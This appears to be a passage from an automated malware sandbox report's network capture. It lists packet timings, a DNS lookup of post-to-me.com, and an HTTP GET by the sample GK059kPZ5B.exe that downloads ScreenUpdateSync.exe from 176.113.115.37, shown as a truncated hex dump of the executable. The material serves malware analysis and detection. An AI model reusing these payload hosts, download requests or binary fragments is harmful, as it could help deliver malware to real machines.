                                                          Oct 26, 2024 19:08:34.612088919 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612103939 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612117052 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612128019 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612128973 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612147093 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612159014 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612162113 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612169981 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612186909 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612186909 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612204075 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612219095 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612220049 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612234116 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612247944 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612248898 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612248898 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612261057 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612265110 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612276077 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612283945 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612299919 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612313986 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612328053 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612341881 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612361908 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612361908 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612361908 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612373114 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612385035 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612389088 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612411976 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612411976 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612421989 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612437010 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612462997 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612463951 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612485886 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612492085 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612512112 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612526894 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612529993 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612543106 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612557888 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612570047 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612570047 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612575054 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612610102 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612610102 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612622976 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612668991 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612685919 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612699032 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612715006 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612735033 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612735033 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612766027 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612782001 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612795115 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612809896 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612823963 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612848997 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612848997 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612848997 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612874031 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612901926 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612922907 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612957001 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612957001 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.612965107 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.612987041 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613003016 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613022089 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613040924 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613040924 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613045931 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613068104 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613079071 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613079071 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613082886 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613121033 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613121033 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613147020 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613162994 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613164902 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613181114 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613195896 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613210917 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613213062 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613214016 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613214016 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613241911 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613257885 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613257885 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613257885 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613257885 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613274097 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613281965 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613290071 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613305092 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613306046 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613315105 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613323927 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613338947 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613357067 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613367081 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613367081 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613367081 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613384962 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613399029 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.613430977 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613430977 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613430977 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.613441944 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614126921 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614151001 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614166975 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614177942 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614190102 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614200115 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614207029 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614217997 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614223003 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614238977 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614253044 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614259958 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614259958 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614274025 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614274025 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614285946 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614300966 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614321947 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614341021 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614346027 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614346027 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614346027 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614372015 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614382982 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614383936 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614382982 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614392996 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614418983 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614434004 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614449978 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614456892 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614456892 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614456892 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614471912 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614486933 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614486933 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614492893 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614509106 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614517927 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614527941 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614530087 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614547968 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614588976 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614590883 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614590883 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614590883 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614603996 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614628077 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614641905 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614654064 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614654064 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614664078 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614681959 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614685059 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614686012 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614705086 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614711046 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614727020 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614732981 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614748001 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614762068 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614778042 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614793062 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614801884 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614801884 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614801884 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614818096 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614830017 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614830017 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614833117 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614847898 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614849091 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614865065 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614876032 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614880085 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614895105 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614917040 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614932060 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614934921 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614934921 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614934921 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614934921 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614948988 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614963055 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614976883 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614989996 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.614994049 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614994049 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614994049 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.614994049 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615005970 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615011930 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615011930 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615022898 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615037918 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615051985 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615071058 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615093946 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615093946 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615093946 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615093946 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615107059 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615122080 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615125895 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615143061 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615158081 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615160942 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615174055 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615200043 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615200043 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615200043 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615210056 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615214109 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615233898 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615243912 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615247965 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615271091 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615274906 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615284920 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615299940 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615319967 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615319967 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615319967 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615335941 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615355968 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615370989 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615384102 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:34.615408897 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615410089 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:34.615446091 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:39.303551912 CEST8049705176.113.115.37192.168.2.5
                                                          Oct 26, 2024 19:08:39.306751966 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:08:39.876889944 CEST4970780192.168.2.562.204.41.177
                                                          Oct 26, 2024 19:08:39.882364035 CEST804970762.204.41.177192.168.2.5
                                                          Oct 26, 2024 19:08:39.882484913 CEST4970780192.168.2.562.204.41.177
                                                          Oct 26, 2024 19:08:39.882617950 CEST4970780192.168.2.562.204.41.177
                                                          Oct 26, 2024 19:08:39.888060093 CEST804970762.204.41.177192.168.2.5
                                                          Oct 26, 2024 19:08:40.769423008 CEST804970762.204.41.177192.168.2.5
                                                          Oct 26, 2024 19:08:40.769534111 CEST4970780192.168.2.562.204.41.177
                                                          Oct 26, 2024 19:08:40.774274111 CEST4970780192.168.2.562.204.41.177
                                                          Oct 26, 2024 19:08:40.779674053 CEST804970762.204.41.177192.168.2.5
                                                          Oct 26, 2024 19:08:41.934814930 CEST804970762.204.41.177192.168.2.5
                                                          Oct 26, 2024 19:08:41.936068058 CEST4970780192.168.2.562.204.41.177
                                                          Oct 26, 2024 19:08:47.436826944 CEST804970762.204.41.177192.168.2.5
                                                          Oct 26, 2024 19:08:47.437011003 CEST4970780192.168.2.562.204.41.177
                                                          Oct 26, 2024 19:08:47.646763086 CEST804970762.204.41.177192.168.2.5
                                                          Oct 26, 2024 19:08:47.646891117 CEST4970780192.168.2.562.204.41.177
                                                          Oct 26, 2024 19:08:47.858764887 CEST804970762.204.41.177192.168.2.5
                                                          Oct 26, 2024 19:08:47.858819962 CEST4970780192.168.2.562.204.41.177
                                                          Oct 26, 2024 19:10:05.523647070 CEST4970780192.168.2.562.204.41.177
                                                          Oct 26, 2024 19:10:21.434583902 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:10:21.748120070 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:10:22.355070114 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:10:23.558217049 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:10:25.964453936 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:10:30.776933908 CEST4970580192.168.2.5176.113.115.37
                                                          Oct 26, 2024 19:10:40.386378050 CEST4970580192.168.2.5176.113.115.37

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 26, 2024 19:08:31.466759920 CEST5228553192.168.2.51.1.1.1
                                                          Oct 26, 2024 19:08:31.476715088 CEST53522851.1.1.1192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 26, 2024 19:08:31.466759920 CEST192.168.2.51.1.1.10xf8feStandard query (0)post-to-me.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 26, 2024 19:08:31.476715088 CEST1.1.1.1192.168.2.50xf8feNo error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                          Oct 26, 2024 19:08:31.476715088 CEST1.1.1.1192.168.2.50xf8feNo error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • post-to-me.com
                                                          • 176.113.115.37
                                                          • 62.204.41.177

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549705176.113.115.37807092C:\Users\user\Desktop\GK059kPZ5B.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 26, 2024 19:08:32.802376986 CEST85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                          User-Agent: ShareScreen
                                                          Host: 176.113.115.37
                                                          Oct 26, 2024 19:08:33.704457045 CEST1236INHTTP/1.1 200 OK
                                                          Date: Sat, 26 Oct 2024 17:08:33 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Last-Modified: Sat, 26 Oct 2024 17:00:01 GMT
                                                          ETag: "62400-625642a987083"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 402432
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b fa 88 0b 0f 9b e6 58 0f 9b e6 58 0f 9b e6 58 b2 d4 70 58 0e 9b e6 58 11 c9 62 58 11 9b e6 58 11 c9 73 58 1b 9b e6 58 11 c9 65 58 64 9b e6 58 28 5d 9d 58 0a 9b e6 58 0f 9b e7 58 74 9b e6 58 11 c9 6c 58 0e 9b e6 58 11 c9 72 58 0e 9b e6 58 11 c9 77 58 0e 9b e6 58 52 69 63 68 0f 9b e6 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bd b3 2f 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 03 00 00 38 10 00 00 00 00 00 ea 16 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 5b 38 06 00 02 00 00 81 00 00 [TRUNCATED]
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$KXXXpXXbXXsXXeXdX(]XXXtXlXXrXXwXXRichXPEL/f8@&[8<.text `.rdata%&@@.dataxL@.rsrc@@
                                                          Oct 26, 2024 19:08:33.704480886 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 f0 43 00 75 02 f3 c3 e9 e5 06 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 5c 08 00 00 8b
                                                          Data Ascii: ;CuUQeVEPuu\u9EttM^jh Ceu;5dQw"jYeVYEEEjYUVuSW=C=DuYj
                                                          Oct 26, 2024 19:08:33.704499960 CEST1236INData Raw: ff ff ff 33 c0 85 f6 0f 95 c0 33 ff 47 50 8b 45 f0 56 57 53 6a 09 ff 70 04 ff 15 d8 c0 43 00 85 c0 0f 84 34 ff ff ff 8b 45 08 85 c0 0f 84 cb fe ff ff 89 38 e9 c4 fe ff ff 8b 45 08 3b c1 74 02 89 08 33 c0 5f c9 c3 8b ff 55 8b ec 51 83 4d fc ff 8b
                                                          Data Ascii: 33GPEVWSjpC4E8E;t3_UQMES]Vtu`Dujuu`DjjC3MQE^[U=lDuuhXYY]jXh`C3uEPCj_}MZf9@u8<@
                                                          Oct 26, 2024 19:08:33.704513073 CEST1236INData Raw: 0c 6a 04 e8 bd 00 00 00 59 c3 3b df 75 0d 8b 45 10 3b c7 74 06 c7 00 0c 00 00 00 8b c3 e8 bb 0c 00 00 c3 8b ff 56 57 33 f6 bf 98 09 44 00 83 3c f5 84 f1 43 00 01 75 1e 8d 04 f5 80 f1 43 00 89 38 68 a0 0f 00 00 ff 30 83 c7 18 e8 29 33 00 00 59 59
                                                          Data Ascii: jY;uE;tVW3D<CuC8h0)3YYtF$|3@_^$C3SCVCW>t~tWWF3&YC|C_t~uPC|^[UE4CC]jhC3G}39
